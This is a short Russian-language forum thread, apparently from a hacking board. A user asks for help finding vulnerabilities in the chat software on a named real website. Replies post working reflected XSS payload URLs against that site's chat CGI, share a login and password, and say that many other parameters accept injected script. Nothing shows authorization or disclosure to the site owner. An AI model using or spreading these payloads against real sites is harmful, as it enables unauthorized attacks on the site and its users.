Пипл, помогите определить уязвимости в чате на http://max-club.ru/ используется ПО max!chat исходников нигде не видел, в самом чате все режется блин
Логин и пасс в студию! а так вообще вот... _http://www.max-club.ru/cgi/newchat.exe?Get='<script>alert('passive_XSS_by_DRON-ANARCHY')</script>AuthorizedTop&Room=Enter
Да и вообще..времени щас протсо нету.... _http://www.max-club.ru/cgi/newchat.exe?TEST=<script>alert('passive_XXS_by_DRON-ANARCHY')</script>
Логин:antichat пасс:qwe123 _http://www.max-club.ru/cgi/newchat.exe?Com=Go&Get=Info&Login=<script>alert()</script>&Room=Enter&SID=chat Набит пассивными ксс
Ну я приблизително это и описал.. там мона и аод Form и под Get и под еще много чего пихать хсс принцип один...
